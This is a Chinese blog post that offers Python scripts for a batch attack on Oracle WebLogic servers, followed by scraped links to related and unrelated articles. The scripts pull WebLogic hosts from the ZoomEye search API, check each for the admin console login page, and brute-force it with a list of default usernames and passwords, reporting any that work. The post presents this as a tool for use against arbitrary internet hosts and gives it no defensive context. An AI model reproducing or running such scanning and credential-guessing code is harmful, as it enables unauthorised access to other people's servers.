前言:


整理笔记的时候,发现了weblogic的攻击方法。心里打着算盘看看怎么写

个批量的弱口令爆破脚本。得出了以下思路

思路:

1.利用钟馗之眼采集weblogic的网站,将IP写入到txt

2.添加后台路径,判断是否能成功连接,并且没有过滤表里面的错误。写入到txt

3.转换路径,将后台路径转换为表单请求的路径写入到txt

4.判断是账号和密码是否成功

详细思路请参考:https://www.jianshu.com/p/e97b109ace40 (同时也是一份攻击weblogic服务的好文章)

代码:

weblogicpass.py

import requests

def zoomeye():

  sjian=open('save.txt','w')

  sjian.close()

  data={"username":"钟馗之眼的登录邮箱","password":"钟馗之眼的登录密码"}

  url='https://api.zoomeye.org/user/login'

  login=requests.post(url=url,json=data)

  access_token=login.json()['access_token']

  logheaders={'Authorization':'JWT'+' '+access_token}

  for x in range(10):

      print('[+]page is {}'.format(x))

      url2s='https://api.zoomeye.org/host/search?query=app:weblogic&page={}'.format(x)

      rest2=requests.get(url=url2s,headers=logheaders)

      vd=rest2.json()['matches'][0:]

      for q in vd:

          sj='IP:',q['ip'],'Port:',q['portinfo']['port'],'App:',q['portinfo']['app']

          print(sj)

          print(sj,file=open('save.txt','a'))

zoomeye()

weblogicjiexi.py

import requests

import re

def jx():

    xj=open('save2.txt','w')

    xj.close()

    error=['','Not Found','不存在','']

    ok=[]

    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

    kew = open('save.txt', 'r')

    for p in kew.readlines():

        we = "".join(p.split('\n'))

        pow = re.findall('(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)',we)

        for i in pow:

            pd = '{}'.format(i).replace('(', '').replace(')', '').replace("'", '').replace(',', '.').replace(' ', '')

            try:

                rsc=requests.get(url='http://{}/console/login/LoginForm.jsp'.format(pd),headers=headers,timeout=1.1)

                for e in error:

                    if rsc.status_code==200 and rsc.text not in e:

                        ok.append(rsc.url)

            except:

                pass

    id = list(set(ok))

    for p in id:

        lk=re.findall('.*/console/login/LoginForm.jsp',p)

        for i in lk:

            print('[+]ok url:',i+'')

            print(i+'',file=open('save2.txt','a'))

jx()

weblogiczhuanhuan.py

import os

import re

rl=open('save3.txt','w')

rl.close()

if os.path.exists('save2.txt'):

    print('[+]ok save2.txt !')

else:

    print('[-]Not found save2.txt')

    exit()

yw=open('save2.txt','r')

for e in yw.readlines():

    w="".join(e.split('\n'))

    yd=re.sub('/console/login/LoginForm.jsp','/console/j_security_check',w)

    print(yd)

    print(yd,file=open('save3.txt','a'))

weblogicbaopo.py

import requests

import threading

def main(ip):

    datas={}

    listd=['weblogic','weblogic','weblogic','welcomel','system','password','admin','security','mary','password','joe','password','wlcsystem','wlcsystem','wlpisystem','wlpisystem','weblogic','admin','weblogic','','admin','']

    url='{}'.format(ip)

    headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

    for user in listd:

      for passwd in listd:

        data='j_username={}&j_password={}&j_character_encoding=UTF-8'.format(user,passwd)

        for j in data.split('&'):

            key,value=j.split('=',1)

            datas[key]=value

        try:

          request=requests.post(url=url,headers=headers,data=datas,allow_redirects=False)

          if request.status_code==302 and 'console' in request.headers['Location'] and 'LoginForm.jsp' not in request.headers['Location']:

              print('[+]url:{}'.format(request.url))

              print('[+]username:{}'.format(user))

              print('[+]password:{}'.format(passwd))

          else:

              print('[-]url:{}'.format(request.url))

              print('[-]Error username:{}'.format(user))

              print('[-]Error password:{}'.format(passwd))

        except:

            pass

if __name__ == '__main__':

    we=open('save3.txt','r')

    for w in we.readlines():

        x="".join(w.split('\n'))

        main(x)

测试

正在爆破某个IP的截图:

python写批量weblogic爆破脚本的更多相关文章

  1. Python Telnet弱口令爆破脚本及遇到的错误与问题

    写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住.然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has ...

  2. python写一个邮箱伪造脚本

    前言: 原本打算学php MVC的思路然后写一个项目.但是贼恶心, 写不出来.然后就还是用python写了个邮箱伪造. 0x01 第一步先去搜狐注册一个邮箱 然后,点开设置,开启SMTP服务. 当然你 ...

  3. python写的自动签到脚本。

    等以后有时间补上. 附上代码: #! /usr/bin/env python # coding:utf-8 #-----------------------------------------学号和密 ...

  4. python+paramiko库+svn写的自动化部署脚本

    第一篇博文 直接开门见山的说了. 这是件什么事?:每次部署都是复制本地的文件粘贴到服务器端,因为路径复杂,所以费时且手工容易出漏洞. 一直在想有什么办法可以解决这种,因为以前在微软的一个牛人同事做过一 ...

  5. python 写的http后台弱口令爆破工具

    今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ...

  6. Python操作Excel_随机点菜脚本

     背景:     中午快餐,菜单吃了个遍,天天纠结于不知道点啥菜.      想起读书考试时,丢纸团选答案,于是用python写个随机点菜脚本玩玩. 功能:      菜单为Excel,一个Sheet ...

  7. Python写网络后台脚本

    Python写网络后台脚本. 首先安装Python3.6.5,在centos中自带的Python是2.6版本的,现在早就出现了3.6版本了况且2和3 之间的差距还是比较大的,所以我选择更新一下Pyth ...

  8. 「懒惰的美德」我用 python 写了个自动生成给文档生成索引的脚本

    我用 python 写了一个自动生成索引的脚本 简介:为了刷算法题,建了一个 GitHub仓库:PiperLiu / ACMOI_Journey,记录自己的刷题轨迹,并总结一下方法.心得.想到一个需求 ...

  9. Python 写了一个批量生成文件夹和批量重命名的工具

    Python 写了一个批量生成文件夹和批量重命名的工具 目录 Python 写了一个批量生成文件夹和批量重命名的工具 演示 功能 1. 可以读取excel内容,使用excel单元格内容进行新建文件夹, ...

随机推荐

  1. JPEG文件格式

    格式:JFIF(JPEG档的交换格式)压缩:JPEG(灰阶影像压缩比约为10:1:彩色影像约为20:1)以JPEG文件格式保存的图像实际上是2个不同格式的混合物:JPEG格式规范本身,用来定义图像的压 ...

  2. FSTConfiguration 高性能序列化框架FST

    转自:https://blog.csdn.net/z69183787/article/details/53005961 fst是完全兼容JDK序列化协议的系列化框架,序列化速度大概是JDK的4-10倍 ...

  3. 【maven】使用import scope解决maven继承(单)问题

    测试环境 maven 3.3.9 想必大家在做SpringBoot应用的时候,都会有如下代码: <parent> <groupId>org.springframework.bo ...

  4. jquery学习1之对juery对象的细节操作1

    jquery是前台动态页面开发的一个很重要的工具. 一:jquery对象中length属性和size()方法 var a=$("a").length;         var b= ...

  5. centos7 添加用户并授权root权限

    centos7.2 版本,我们不可能每次都用root账号登陆,root账号公认的不安全,所以,首先,禁止掉root账号的登陆.1.静止root账号登陆. $ vi /etc/ssh/sshd.conf ...

  6. 上产使用MQ的三点注意

    安全性考量:在正式环境中使用消息队列中间件服务一定要做相关的安全性设置.包括启用消息队列服务的用户名和密码.启用消息队列服务自带的SSL加密设置.如果您使用的消息队列服务不自带SSL加密,则一定要自己 ...

  7. Fix Visual Studio 2013 Razor CSHTML Intellisense in Class Library or Console Application

    https://mhusseini.wordpress.com/2015/02/05/fix-visual-studio-2013-razor-cshtml-intellisense-in-class ...

  8. php如何分割字符串?php mb_substr分割字条串,解决中文乱码问题,支持分割中文! (转)

    因为网站开发需要,必须有一项功能可以把字符串一个一个分割开来,并且转换为数组. 刚开始用“str_split函数”在实验分割中文字符时就出现了乱码. 蚂蚁学院经过一翻研究,最终发现以下方法可以有效分割 ...

  9. Hadoop专业解决方案-第13章 Hadoop的发展趋势

    一.前言: 非常感谢Hadoop专业解决方案群:313702010,兄弟们的大力支持,在此说一声辛苦了,经过两周的努力,已经有啦初步的成果,目前第13章 Hadoop的发展趋势小组已经翻译完成,在此对 ...

  10. maven学习(2)-在Eclipse 中使用Maven

    第一节:m2eclipse 插件安装 打开Eclipse,点击菜单Help - > Install New Software 点击Add 按钮Name:m2e location: http:// ...